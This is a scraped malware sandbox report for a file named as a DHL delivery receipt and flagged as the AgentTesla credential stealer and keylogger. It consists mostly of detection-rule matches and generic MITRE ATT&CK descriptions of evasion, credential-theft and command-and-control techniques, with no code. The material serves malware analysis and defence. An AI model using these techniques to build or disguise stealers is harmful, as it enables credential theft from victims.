Yara matches:	Rule: JoeSecurity_404Keylogger, Description: Yara detected 404Keylogger, Source: 00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_404Keylogger, Description: Yara detected 404Keylogger, Source: 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Recibo de entrega de DHL.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre